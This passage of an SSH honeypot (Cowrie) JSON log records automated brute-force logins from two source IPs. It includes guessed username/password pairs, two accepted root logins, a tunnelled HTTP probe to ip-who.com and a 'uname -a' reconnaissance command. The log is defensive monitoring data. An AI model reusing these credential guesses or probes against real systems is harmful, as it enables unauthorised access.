etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:05:11.681623Z","src_ip":"212.227.235.229","session":"b3ecc67f7228"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48534,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dde43652618","protocol":"ssh","message":"New connection: 212.227.235.229:48534 (1.2.3.4:22) [session: 2dde43652618]","sensor":"my-vps","timestamp":"2025-08-26T21:05:17.062110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:05:17.210831Z","src_ip":"212.227.235.229","session":"2dde43652618"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:05:17.418006Z","src_ip":"212.227.235.229","session":"2dde43652618"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48516,"dst_ip":"1.2.3.4","dst_port":22,"session":"72c33431b1e4","protocol":"ssh","message":"New connection: 212.227.235.229:48516 (1.2.3.4:22) [session: 72c33431b1e4]","sensor":"my-vps","timestamp":"2025-08-26T21:05:20.099753Z"}
{"eventid":"cowrie.login.failed","username":"rebecca","password":"rebecca","message":"login attempt [rebecca/rebecca] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:20.594042Z","src_ip":"212.227.235.229","session":"2dde43652618"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:05:20.884487Z","src_ip":"212.227.235.229","session":"72c33431b1e4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:05:21.157860Z","src_ip":"212.227.235.229","session":"72c33431b1e4"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:22.357635Z","src_ip":"212.227.235.229","session":"2dde43652618"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"sshd","message":"login attempt [sshd/sshd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:22.613799Z","src_ip":"212.227.235.229","session":"72c33431b1e4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"p@ssw0rd","message":"login attempt [admin/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:23.276072Z","src_ip":"212.227.235.229","session":"445885e47385"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:24.071025Z","src_ip":"212.227.235.229","session":"72c33431b1e4"}
{"eventid":"cowrie.session.closed","duration":"17.2","message":"Connection lost after 17.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:25.074434Z","src_ip":"212.227.235.229","session":"445885e47385"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:05:26.863983Z","src_ip":"212.227.235.229","session":"b3ecc67f7228"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:05:27.152189Z","session":"b3ecc67f7228"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:05:27.751062Z","src_ip":"212.227.235.229","session":"b3ecc67f7228"}
{"eventid":"cowrie.session.closed","duration":"16.8","message":"Connection lost after 16.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:28.004239Z","src_ip":"212.227.235.229","session":"b3ecc67f7228"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59204,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f7a85a9da10","protocol":"ssh","message":"New connection: 212.227.235.229:59204 (1.2.3.4:22) [session: 5f7a85a9da10]","sensor":"my-vps","timestamp":"2025-08-26T21:05:41.261079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:05:41.326966Z","src_ip":"212.227.235.229","session":"5f7a85a9da10"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:05:43.159283Z","src_ip":"212.227.235.229","session":"5f7a85a9da10"}
{"eventid":"cowrie.login.failed","username":"btf","password":"321start","message":"login attempt [btf/321start] failed","sensor":"my-vps","timestamp":"2025-08-26T21:05:45.609965Z","src_ip":"212.227.235.229","session":"5f7a85a9da10"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:47.369480Z","src_ip":"212.227.235.229","session":"5f7a85a9da10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":16817,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cb36b0c7d6d","protocol":"ssh","message":"New connection: 212.227.125.160:16817 (1.2.3.4:22) [session: 1cb36b0c7d6d]","sensor":"my-vps","timestamp":"2025-08-26T21:05:48.037989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:05:48.040198Z","src_ip":"212.227.125.160","session":"1cb36b0c7d6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:05:48.167786Z","src_ip":"212.227.125.160","session":"1cb36b0c7d6d"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e","message":"login attempt [root/1q@W3e] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:05:48.553267Z","src_ip":"212.227.125.160","session":"1cb36b0c7d6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:05:48.881709Z","src_ip":"212.227.125.160","session":"1cb36b0c7d6d"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T21:05:48.883027Z","src_ip":"212.227.125.160","session":"1cb36b0c7d6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:49.011859Z","src_ip":"212.227.125.160","session":"1cb36b0c7d6d"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:05:49.012888Z","src_ip":"212.227.125.160","session":"1cb36b0c7d6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59170,"dst_ip":"1.2.3.4","dst_port":22,"session":"265eb12eb1f4","protocol":"ssh","message":"New connection: 212.227.235.229:59170 (1.2.3.4:22) [session: 265eb12eb1f4]","sensor":"my-vps","timestamp":"2025-08-26T21:05:59.519519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:05:59.549225Z","src_ip":"212.227.235.229","session":"265eb12eb1f4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:05:59.816375Z","src_ip":"212.227.235.229","session":"265eb12eb1f4"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-26T21:06:01.063165Z","src_ip":"212.227.235.229","session":"265eb12eb1f4"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:01.886952Z","src_ip":"212.227.125.160","session":"d1fc2bc697e4"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:06:02.693837Z","src_ip":"212.227.235.229","session":"265eb12eb1f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59176,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6da223d5eec","protocol":"ssh","message":"New connection: 212.227.235.229:59176 (1.2.3.4:22) [session: b6da223d5eec]","sensor":"my-vps","timestamp":"2025-08-26T21:06:04.609559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:06:04.610839Z","src_ip":"212.227.235.229","session":"b6da223d5eec"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh